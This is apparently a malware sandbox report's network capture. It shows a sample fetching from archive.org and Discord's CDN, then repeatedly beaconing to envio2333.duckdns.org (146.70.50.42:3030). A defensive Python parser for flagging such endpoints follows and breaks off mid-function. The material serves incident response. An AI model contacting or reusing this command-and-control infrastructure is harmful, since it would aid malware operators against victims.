                                                                                  Apr 26, 2025 02:53:47.996356010 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.996356010 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.996445894 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.996459961 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.996496916 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.996504068 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.996530056 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.996568918 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.996584892 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.996637106 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.996637106 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.996644974 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.996910095 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.996927023 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.997042894 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.997052908 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.997157097 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.997179031 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.997247934 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.997247934 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.997255087 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.997319937 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.997333050 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.997401953 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.997409105 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.997596979 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.997613907 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.997663975 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.997673988 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.997680902 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.997689009 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.997690916 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.997714043 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.998106956 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.998358965 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.998374939 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.998426914 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.998456955 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.998469114 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.998473883 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.998483896 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.998588085 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.998588085 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.998605967 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.998663902 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.998672009 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.998684883 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.999074936 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.999089003 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.999125957 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.999139071 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.999154091 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.999154091 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.999162912 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.999239922 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.999239922 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.999408007 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.999423981 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.999479055 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.999479055 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.999485970 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.999516964 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.999547005 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.999572039 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.999572039 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.999578953 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.999634981 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.999634981 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.999675035 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.999690056 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.999783039 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.999802113 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.999808073 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.999844074 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.999895096 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:47.999941111 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:47.999958038 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:48.000067949 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:48.000073910 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:48.000109911 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:48.000128031 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:48.000159025 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:48.000164986 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:48.000190973 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:48.000309944 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:48.000330925 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:48.000400066 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:48.000400066 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:48.000406981 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:48.000453949 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:48.000473976 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:48.000534058 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:48.000534058 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:48.000540972 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:48.000616074 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:48.006627083 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:48.006638050 CEST44349720207.241.233.30192.168.2.4
                                                                                  Apr 26, 2025 02:53:48.006717920 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:48.006941080 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:48.006941080 CEST49720443192.168.2.4207.241.233.30
                                                                                  Apr 26, 2025 02:53:48.059900045 CEST49678443192.168.2.420.189.173.27
                                                                                  Apr 26, 2025 02:53:48.365814924 CEST49678443192.168.2.420.189.173.27
                                                                                  Apr 26, 2025 02:53:48.624341011 CEST49671443192.168.2.4204.79.197.203
                                                                                  Apr 26, 2025 02:53:48.968027115 CEST49678443192.168.2.420.189.173.27
                                                                                  Apr 26, 2025 02:53:49.222974062 CEST49715443192.168.2.4204.79.197.222
                                                                                  Apr 26, 2025 02:53:49.363028049 CEST44349715204.79.197.222192.168.2.4
                                                                                  Apr 26, 2025 02:53:49.364733934 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:49.364772081 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:49.364836931 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:49.365288973 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:49.365299940 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:49.671159029 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:49.671230078 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:49.676125050 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:49.676134109 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:49.676404953 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:49.678796053 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:49.724266052 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.045862913 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.045937061 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.045965910 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.045984983 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.045994043 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.046058893 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.046077013 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.046081066 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.046139002 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.046143055 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.046855927 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.046892881 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.046924114 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.046951056 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.046952963 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.046962976 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.046969891 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.047003984 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.047715902 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.047771931 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.047801018 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.047816038 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.047822952 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.047856092 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.048542023 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.048600912 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.048629999 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.048645973 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.048650980 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.048712015 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.049413919 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.049488068 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.049514055 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.049566031 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.049571991 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.049617052 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.050172091 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.050237894 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.050261974 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.050308943 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.050314903 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.050364971 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.051059961 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.051112890 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.051152945 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.051189899 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.051194906 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.051239014 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.051862001 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.051932096 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.051965952 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.051985979 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.051990986 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.052026987 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.052683115 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.052746058 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.052861929 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.052869081 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.053334951 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.053364038 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.053411007 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.053417921 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.053453922 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.054198027 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.054266930 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.171178102 CEST49678443192.168.2.420.189.173.27
                                                                                  Apr 26, 2025 02:53:50.193613052 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.193734884 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.193743944 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.193788052 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.193886995 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.194009066 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.195171118 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.195245981 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.195317984 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.195385933 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.195892096 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.195955992 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.197000027 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.197077990 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.197083950 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.197108030 CEST44349723162.159.134.233192.168.2.4
                                                                                  Apr 26, 2025 02:53:50.197175026 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.197189093 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:50.197506905 CEST49723443192.168.2.4162.159.134.233
                                                                                  Apr 26, 2025 02:53:52.577404976 CEST49678443192.168.2.420.189.173.27
                                                                                  Apr 26, 2025 02:53:54.972938061 CEST497253030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:53:55.999366045 CEST497253030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:53:57.393721104 CEST49678443192.168.2.420.189.173.27
                                                                                  Apr 26, 2025 02:53:58.093051910 CEST497253030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:53:58.405531883 CEST49671443192.168.2.4204.79.197.203
                                                                                  Apr 26, 2025 02:54:02.093044996 CEST497253030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:54:06.999283075 CEST49678443192.168.2.420.189.173.27
                                                                                  Apr 26, 2025 02:54:10.093056917 CEST497253030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:54:21.109895945 CEST497263030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:54:22.108760118 CEST497263030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:54:22.937223911 CEST4971280192.168.2.4172.217.12.131
                                                                                  Apr 26, 2025 02:54:22.937376976 CEST4971180192.168.2.4199.232.214.172
                                                                                  Apr 26, 2025 02:54:22.937433958 CEST4971480192.168.2.4199.232.214.172
                                                                                  Apr 26, 2025 02:54:23.085305929 CEST8049712172.217.12.131192.168.2.4
                                                                                  Apr 26, 2025 02:54:23.085377932 CEST4971280192.168.2.4172.217.12.131
                                                                                  Apr 26, 2025 02:54:23.086049080 CEST8049714199.232.214.172192.168.2.4
                                                                                  Apr 26, 2025 02:54:23.086060047 CEST8049714199.232.214.172192.168.2.4
                                                                                  Apr 26, 2025 02:54:23.086200953 CEST4971480192.168.2.4199.232.214.172
                                                                                  Apr 26, 2025 02:54:23.088323116 CEST8049711199.232.214.172192.168.2.4
                                                                                  Apr 26, 2025 02:54:23.088335037 CEST8049711199.232.214.172192.168.2.4
                                                                                  Apr 26, 2025 02:54:23.088381052 CEST4971180192.168.2.4199.232.214.172
                                                                                  Apr 26, 2025 02:54:24.108830929 CEST497263030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:54:28.124353886 CEST497263030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:54:36.124376059 CEST497263030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:54:47.156845093 CEST497283030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:54:48.171257973 CEST497283030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:54:50.171291113 CEST497283030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:54:54.171346903 CEST497283030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:02.171263933 CEST497283030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:13.923880100 CEST497293030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:14.939964056 CEST497293030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:16.938294888 CEST497293030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:20.936924934 CEST497293030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:22.062087059 CEST49708443192.168.2.452.113.196.254
                                                                                  Apr 26, 2025 02:55:27.999140024 CEST44349713131.253.33.254192.168.2.4
                                                                                  Apr 26, 2025 02:55:28.950624943 CEST497293030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:30.032778978 CEST44349715204.79.197.222192.168.2.4
                                                                                  Apr 26, 2025 02:55:39.971981049 CEST497303030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:40.983834982 CEST497303030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:42.983827114 CEST497303030192.168.2.4146.70.50.42
                                                                                  Apr 26, 2025 02:55:46.983829021 CEST497303030192.168.2.4146.70.50.42
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Apr 26, 2025 02:53:45.206456900 CEST  58521  53  192.168.2.4  1.1.1.1
Apr 26, 2025 02:53:45.346749067 CEST  53  58521  1.1.1.1  192.168.2.4
Apr 26, 2025 02:53:46.047657013 CEST  61836  53  192.168.2.4  1.1.1.1
Apr 26, 2025 02:53:46.219835997 CEST  53  61836  1.1.1.1  192.168.2.4
Apr 26, 2025 02:53:49.223866940 CEST  63738  53  192.168.2.4  1.1.1.1
Apr 26, 2025 02:53:49.364090919 CEST  53  63738  1.1.1.1  192.168.2.4
Apr 26, 2025 02:53:54.740283966 CEST  65500  53  192.168.2.4  1.1.1.1
Apr 26, 2025 02:53:54.968466997 CEST  53  65500  1.1.1.1  192.168.2.4
Apr 26, 2025 02:55:13.187845945 CEST  57287  53  192.168.2.4  1.1.1.1
Apr 26, 2025 02:55:13.922892094 CEST  53  57287  1.1.1.1  192.168.2.4
Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
Apr 26, 2025 02:53:45.206456900 CEST  192.168.2.4  1.1.1.1  0x52cb  Standard query (0)  archive.org  A (IP address)  IN (0x0001)  false
Apr 26, 2025 02:53:46.047657013 CEST  192.168.2.4  1.1.1.1  0x27f1  Standard query (0)  ia801700.us.archive.org  A (IP address)  IN (0x0001)  false
Apr 26, 2025 02:53:49.223866940 CEST  192.168.2.4  1.1.1.1  0x3259  Standard query (0)  cdn.discordapp.com  A (IP address)  IN (0x0001)  false
Apr 26, 2025 02:53:54.740283966 CEST  192.168.2.4  1.1.1.1  0x79b8  Standard query (0)  envio2333.duckdns.org  A (IP address)  IN (0x0001)  false
Apr 26, 2025 02:55:13.187845945 CEST  192.168.2.4  1.1.1.1  0x5868  Standard query (0)  envio2333.duckdns.org  A (IP address)  IN (0x0001)  false
Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
Apr 26, 2025 02:53:45.346749067 CEST  1.1.1.1  192.168.2.4  0x52cb  No error (0)  archive.org  -  207.241.224.2  A (IP address)  IN (0x0001)  false
Apr 26, 2025 02:53:46.219835997 CEST  1.1.1.1  192.168.2.4  0x27f1  No error (0)  ia801700.us.archive.org  -  207.241.233.30  A (IP address)  IN (0x0001)  false
Apr 26, 2025 02:53:49.364090919 CEST  1.1.1.1  192.168.2.4  0x3259  No error (0)  cdn.discordapp.com  -  162.159.134.233  A (IP address)  IN (0x0001)  false
Apr 26, 2025 02:53:49.364090919 CEST  1.1.1.1  192.168.2.4  0x3259  No error (0)  cdn.discordapp.com  -  162.159.130.233  A (IP address)  IN (0x0001)  false
Apr 26, 2025 02:53:49.364090919 CEST  1.1.1.1  192.168.2.4  0x3259  No error (0)  cdn.discordapp.com  -  162.159.133.233  A (IP address)  IN (0x0001)  false
Apr 26, 2025 02:53:49.364090919 CEST  1.1.1.1  192.168.2.4  0x3259  No error (0)  cdn.discordapp.com  -  162.159.129.233  A (IP address)  IN (0x0001)  false
Apr 26, 2025 02:53:49.364090919 CEST  1.1.1.1  192.168.2.4  0x3259  No error (0)  cdn.discordapp.com  -  162.159.135.233  A (IP address)  IN (0x0001)  false
Apr 26, 2025 02:53:54.968466997 CEST  1.1.1.1  192.168.2.4  0x79b8  No error (0)  envio2333.duckdns.org  -  146.70.50.42  A (IP address)  IN (0x0001)  false
Apr 26, 2025 02:55:13.922892094 CEST  1.1.1.1  192.168.2.4  0x5868  No error (0)  envio2333.duckdns.org  -  146.70.50.42  A (IP address)  IN (0x0001)  false
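The packet and DNS tables above carry the two findings a responder wants out of this report: the sample opens a fresh socket to 146.70.50.42:3030 roughly every 26 seconds, sends the Windows SYN retry sequence (retransmits after 1, 2, 4 and 8 s) and never receives a byte back, and that address is what the dynamic DNS name envio2333.duckdns.org resolved to. The script below is an added example, not part of the Joe Sandbox report, that parses rows in the fused export format shown on this page, joins the TCP/UDP rows to the DNS answers, and flags remote endpoints that keep receiving connection attempts without ever answering. The embedded rows are copied from the tables above; the assumptions are that the analysis host is 192.168.2.4, that local source ports fall in the Windows dynamic range (49152 and up, which is what makes the fused port/port/IP/IP field splittable), that the export prints IPv4 octets without leading zeros, and the short dynamic DNS suffix list, of which only duckdns.org is taken from the report.

```python
"""Parse the fused packet and DNS rows of a Joe Sandbox network dump and flag
remote endpoints the sample kept trying to reach without ever getting a packet
back, joined to the DNS names that resolved to them (added example, not report code)."""
import re
from collections import defaultdict
from datetime import datetime

LOCAL_IP = "192.168.2.4"     # the analysis VM in this report
EPHEMERAL_MIN = 49152        # assumption: Windows dynamic source ports start here
DYNDNS_SUFFIXES = ("duckdns.org", "no-ip.com", "ddns.net")   # illustrative list
IPV4 = re.compile(r"(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})")
TS = re.compile(r"^([A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+) [A-Z]+(\d.*)$")
DNS_A = re.compile(r"No error \(0\)(.+?)(\d{1,3}(?:\.\d{1,3}){3})A \(IP address\)")

# Rows copied from the report's TCP/UDP and DNS answer tables (local host, SYN
# retries to the port-3030 endpoint, one answered HTTP flow, one DNS exchange).
TCP_ROWS = """\
Apr 26, 2025 02:53:54.740283966 CEST6550053192.168.2.41.1.1.1
Apr 26, 2025 02:53:54.968466997 CEST53655001.1.1.1192.168.2.4
Apr 26, 2025 02:53:54.972938061 CEST497253030192.168.2.4146.70.50.42
Apr 26, 2025 02:53:55.999366045 CEST497253030192.168.2.4146.70.50.42
Apr 26, 2025 02:53:58.093051910 CEST497253030192.168.2.4146.70.50.42
Apr 26, 2025 02:54:02.093044996 CEST497253030192.168.2.4146.70.50.42
Apr 26, 2025 02:54:10.093056917 CEST497253030192.168.2.4146.70.50.42
Apr 26, 2025 02:54:21.109895945 CEST497263030192.168.2.4146.70.50.42
Apr 26, 2025 02:54:22.937223911 CEST4971280192.168.2.4172.217.12.131
Apr 26, 2025 02:54:23.085305929 CEST8049712172.217.12.131192.168.2.4
Apr 26, 2025 02:54:47.156845093 CEST497283030192.168.2.4146.70.50.42
"""
DNS_ROWS = """\
Apr 26, 2025 02:53:45.346749067 CEST1.1.1.1192.168.2.40x52cbNo error (0)archive.org207.241.224.2A (IP address)IN (0x0001)false
Apr 26, 2025 02:53:54.968466997 CEST1.1.1.1192.168.2.40x79b8No error (0)envio2333.duckdns.org146.70.50.42A (IP address)IN (0x0001)false
"""


def is_ipv4(s):
    # Octets 0-255, no leading zeros (assumption about how the export prints IPs).
    m = IPV4.fullmatch(s)
    return bool(m) and all(int(o) <= 255 and (o == "0" or o[0] != "0") for o in m.groups())


def parse_row(row):
    """One fused TCP/UDP row -> (timestamp, src_port, dst_port, src_ip, dst_ip)."""
    m = TS.match(row.strip())
    if not m:
        raise ValueError(f"no timestamp in {row!r}")
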